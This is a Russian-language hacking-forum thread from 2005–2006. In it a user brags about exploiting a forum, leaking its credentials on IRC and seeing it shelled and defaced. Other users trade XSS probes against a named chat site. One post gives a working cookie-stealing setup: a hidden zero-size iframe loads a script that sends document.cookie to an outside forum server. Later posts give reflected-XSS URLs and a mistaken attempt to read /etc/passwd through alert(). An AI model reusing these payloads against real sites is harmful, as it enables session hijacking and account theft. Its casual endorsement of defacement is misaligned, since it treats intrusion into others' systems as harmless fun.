Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
10.08.2005, 21:19
|
|
Участник форума
Регистрация: 19.07.2005
Сообщений: 292
Провел на форуме:
208487
Репутация:
11
|
|
Прикол недавно обнаружили, короче, а история такая:
Сидел я сидел, и чет мне один форум захотелось зафлеймить, взял афторский сплойт, нашел в общем все что нужно, конечно засрал форум, а потом а ирке в общяк бросил пароль с логином, вы бы видели че с форумом делали...и шел залили, и дефейснули(правда потом обратно вернули), но самое главное, у этого domena.victim.ru был доступ www))) короче у нас свой сервант с высокоскоростным каналом, скоро бота на ирк поставим))
|
|
|
11.08.2005, 03:50
|
|
Новичок
Регистрация: 14.07.2005
Сообщений: 23
Провел на форуме:
79902
Репутация:
1
|
|
но самое главное, у этого domena.victim.ru был доступ www
Сам то понял, что сказал?
|
|
|
|
11.08.2005, 12:10
|
|
Тут может быть ваша реклама.
Регистрация: 30.07.2005
Сообщений: 1,243
Провел на форуме:
4520553
Репутация:
1316
|
|
страница своя типа такой должна быть?
Файл 1.html
<IFRAME SRC="2.html" height=0 width=0 frameborder=0 vspace=0 hspace=0></iframe>
<center>
<img src=http://www.xoxma.ru/img/baba.jpg>
</center>
Файл 2.html
<html>
<body>
<script>
navigate("http://chat.gala.net/?index.php?=\" style=\"background:url('javascript :i=new Image()\\;i.src=\\'http://antichat.ru/cgi-bin/s.jpg?\\'%2Bdocument.cookie');");
</script>
</body>
</html> |
|
|
|
11.08.2005, 12:42
|
|
Banned
Регистрация: 18.05.2005
Сообщений: 1,981
Провел на форуме:
1941233
Репутация:
2726
|
|
Прошу объяснить мне такую вещь.
Есть форум, и там можно в url прописать
http://forum/last.php?do=<script>alert()</script>
и выскакивает alert. Прбовал ../../../etc/passwd
ЁЁёёё )) Извините что не читал пред. посты, возможно уже все обьяснили...
Чувак, ты пишешь alert(). У тебя браузер (БРАУЗЕР) выполняет этот код.
Откуда у тебя ТВОЙ БРАУЗЕР возьмет /etc/passwd ? Это вообще как понимать)) Ну бывают же вопросы)) /etc/passwd храниться на СЕРВЕРЕ.
Да и что ты получишь выводом /etc/passwd, даже если бы alert() могла читать файлы, и у тебя на диске хранился етс/пассвд (смешно конечно))) ? Много (или не очень) записей юзеров с логином, интерпретатором и т д НО БЕЗ ПАРОЛЯ.
Последний раз редактировалось KEZ; 11.08.2005 в 12:45..
|
|
|
|
11.08.2005, 16:13
|
|
Тут может быть ваша реклама.
Регистрация: 30.07.2005
Сообщений: 1,243
Провел на форуме:
4520553
Репутация:
1316
|
|
я этим проверял на php инъекцию, думал мож прокатит
|
|
|
|
23.06.2006, 14:09
|
|
Познавший АНТИЧАТ
Регистрация: 26.11.2004
Сообщений: 1,149
Провел на форуме:
941818
Репутация:
569
|
|
Это все фигня =))) мой первый вопрос на форуме хакзоны было: "Как проникнуть на винты ФСБ" =)))
|
|
|
|
24.06.2006, 19:30
|
|
ветеран
Регистрация: 22.06.2004
Сообщений: 2,128
Провел на форуме:
5355463
Репутация:
2258
|
|
ыыыы )))))))) а мой...зашел на сайт а там индекса не было и содержимое папки было видно, вот и спросил, можно ли с этим поделать что нибудь)))))
__________________
Моня тот еще зверюга,
Свиду тихий внутри - ****,
Без обид,реальный мэн,
Просто рифмы нет совсем.
С ним шутить *****то очень,
В ирце вместе с ним хохочем (c) m0Hze
|
|
|
|
24.06.2006, 20:59
|
|
Новичок
Регистрация: 02.11.2005
Сообщений: 26
Провел на форуме:
60473
Репутация:
1
|
|
киборг, советую почитать статьи по Xss и понять что это за баг.
|
|
|
|
24.06.2006, 21:21
|
|
Тут может быть ваша реклама.
Регистрация: 30.07.2005
Сообщений: 1,243
Провел на форуме:
4520553
Репутация:
1316
|
|
>>киборг, советую почитать статьи по Xss и понять что это за баг.
ды хрен поймешь, чо там написано. Какие то скули, инклуды, этот баг вроде к ним относиться, да?
Вроде как если xss, то файл можно прочесть явой скрипт, например так
http://forum/last.php?do=<script>alert('/etc/passwd')</script>
но почему то он не показываеться, помоги а?
|
|
|
|
25.06.2006, 04:11
|
|
Banned
Регистрация: 20.06.2006
Сообщений: 8
Провел на форуме:
30587
Репутация:
3
|
|
Код:
<form name=chatlogin action=/?index.php?"><script>alert()</script> method=post>
Вот результат твоего когда.
Мне лично кажется, что ты просто обращаешься к самой странице. Это типа если бы ты сделал
Код:
http://chat.gala.net/?index.php?p="><script>alert()</script>
На античате была такая же уязвимость которую нашел Fr1k кажется на главной странице.
Тут твой код выполняется не на самом сервере, а на странице к которой ты обратился. Мне так кажется.
Код HTML:
http://chat.gala.net/?"><script>alert()</script>
После знака вопроса просто идет индекс файлов. Лист их, а фильтрация отсутствует вот и все.
index.php это файл в который пошлется твоя вводимая информация, которая будет этим файлом обработана.
Хотя тут можно только гадать не посмотревши исходники.
Код:
<form name=chatlogin action=/?index%00.php?p="><script>alert()</script> method=post>
Но так алерта не должно быть и не будет и нет +)))))))
Спроси у Алгола короче да нам расскажи что он скажет.
Последний раз редактировалось Любой; 25.06.2006 в 04:22..
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
